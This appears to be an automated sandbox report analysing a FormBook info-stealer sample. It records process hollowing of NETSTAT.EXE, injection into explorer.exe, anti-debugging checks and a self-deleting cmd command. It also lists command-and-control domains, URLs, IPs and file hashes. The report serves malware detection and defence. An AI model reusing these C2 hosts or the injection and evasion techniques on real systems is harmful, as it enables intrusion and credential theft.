Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03891DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_039305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_039305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03918DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03938D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03894D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03873D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0386AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038EA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038E3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03887D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.contecoliving.com
Source: C:\Windows\explorer.exe | Domain query: www.constipationhub.com
Source: C:\Windows\explorer.exe | Network Connect: 69.163.220.52 80
Source: C:\Windows\explorer.exe | Domain query: www.identityofplace.com
Source: C:\Windows\explorer.exe | Domain query: www.tententacleshydro.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section loaded: unknown target: C:\Users\user\Desktop\Y4U48592345670954.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: DD0000
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
Source: explorer.exe, 00000003.00000002.914350326.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.668563200.0000000005E50000.00000004.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.914814661.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.915598169.0000000004AD0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API1 | Path Interception | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery141 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion3 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection612 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information3 | LSA Secrets | System Network Configuration Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing11 | Cached Domain Credentials | System Network Connections Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery12 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

Behavior Graph

Behavior Graph ID: 383918 | Sample: Y4U48592345670954.exe | Startdate: 08/04/2021 | Architecture: WINDOWS | Score: 100

Process tree (from the behavior graph):

Start
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
  -> Y4U48592345670954.exe (started)
     Dropped: C:\Users\user\AppData\...\yow0w7y8ovyw.dll, PE32
     Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
     -> Y4U48592345670954.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> explorer.exe (injected)
           DNS/IP: www.contecoliving.com 69.163.220.52, 49760, 80 DREAMHOST-ASUS United States; www.tententacleshydro.com; 5 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
           -> NETSTAT.EXE (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> cmd.exe (started)
                 -> conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Y4U48592345670954.exe | 17% | Virustotal |
Y4U48592345670954.exe | 17% | ReversingLabs | Win32.Trojan.Injexa

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll | 6% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
2.1.Y4U48592345670954.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.NETSTAT.EXE.32fe660.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.2.Y4U48592345670954.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.NETSTAT.EXE.3d6f834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.Y4U48592345670954.exe.2850000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
tententacleshydro.com | 4% | Virustotal |
www.contecoliving.com | 0% | Virustotal |
constipationhub.com | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w | 100% | Avira URL Cloud | malware
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
www.middlehambooks.com/klf/ | 0% | Avira URL Cloud | safe
http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D | 100% | Avira URL Cloud | malware
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up | 100% | Avira URL Cloud | malware
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tententacleshydro.com | 34.102.136.180 | true | false | | unknown
www.contecoliving.com | 69.163.220.52 | true | true | | unknown
constipationhub.com | 34.102.136.180 | true | false | | unknown
identityofplace.com | 34.102.136.180 | true | false | | unknown
www.identityofplace.com | unknown | unknown | true | | unknown
www.tententacleshydro.com | unknown | unknown | true | | unknown
www.constipationhub.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.middlehambooks.com/klf/ | true | Avira URL Cloud: safe | low
http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D | true | Avira URL Cloud: malware | unknown
http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up | false | Avira URL Cloud: malware | unknown
http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up | false | Avira URL Cloud: safe | unknown
http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w | NETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000003.00000002.915663862.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | tententacleshydro.com | United States | 15169 | GOOGLEUS | false
69.163.220.52 | www.contecoliving.com | United States | 26347 | DREAMHOST-ASUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383918
Start date: 08.04.2021
Start time: 12:25:53
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 26s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Y4U48592345670954.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.9% (good quality ratio 25.5%)
• Quality average: 74.3%
• Quality standard deviation: 30.9%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 104.43.139.144, 13.88.21.125, 20.82.210.154, 104.42.151.234, 52.155.217.156, 20.54.26.129, 23.10.249.26, 23.10.249.43, 20.82.209.183
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

Match: DREAMHOST-ASUS

Associated Sample Name / URL | Detection | Context
invoice.exe | malicious | 69.163.228.164
56_012021.doc | malicious | 208.97.151.226
sample.exe | malicious | 173.236.229.64
ARBmDNJS7m.exe | malicious | 208.113.205.238
New _Items.Xlsx.Pdf.exe | malicious | 66.33.222.0
Payment TT Copy. PDF.exe | malicious | 66.33.222.0
4849708PO # RMS0001.exe | malicious | 69.163.228.230
eogHAzg03I.exe | malicious | 67.205.11.26
purchase order#034.exe | malicious | 69.163.228.230
BSG_ptf.exe | malicious | 69.163.167.164
nxHN51lQwj.exe | malicious | 69.163.225.40
kw8VTJCVE6.exe | malicious | 69.163.225.40
9JZ1Nq9jXa.exe | malicious | 69.163.225.40
RFQ 204871 AGC_pdf.exe | malicious | 69.163.167.164
RAQ11986.exe | malicious | 69.163.225.47
ORDER LIST.xlsx | malicious | 173.236.158.78
swift copy pdf.exe | malicious | 173.236.165.225
Inquiry pdf.exe | malicious | 173.236.165.225
SHIPPING DOCS.xlsx | malicious | 69.163.157.222
RFQ SECO WARWICK Germany.doc | malicious | 173.236.190.98

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

C:\Users\user\AppData\Local\Temp\3kusvrc50ywls0rc
Process: C:\Users\user\Desktop\Y4U48592345670954.exe
File Type: data
Category: dropped
Size (bytes): 185856
Entropy (8bit): 7.999086744314393
Encrypted: true
SSDEEP: 3072:DJrpwn8nX8cVji9mN7vyqjC2Hw1cfy6VPbPixK3gf+HiL1mVURAZkylpmbkxQFGh:rDX8Ai9mv9eMy6VP+xNYkm0spiNGh
MD5: 04F2CCB649106E4B8403BA47BF0B161D
SHA1: D686FB1081635869059CE0034FD1EDD0A01E35E7
SHA-256: D60A87D9CE46455806CDE5F3A8515DF1A515C9062139C76D14BF75BEAECAD527
SHA-512: 12999CFF3B8442865DFC09508CF13F4829A279172EB8A85E5D92889C297894AEE0EAAB04149958D952C17CB9AD8F7816EE9DD6BCD758CD7D59D69441F4AC859F
Malicious: false
Reputation: low
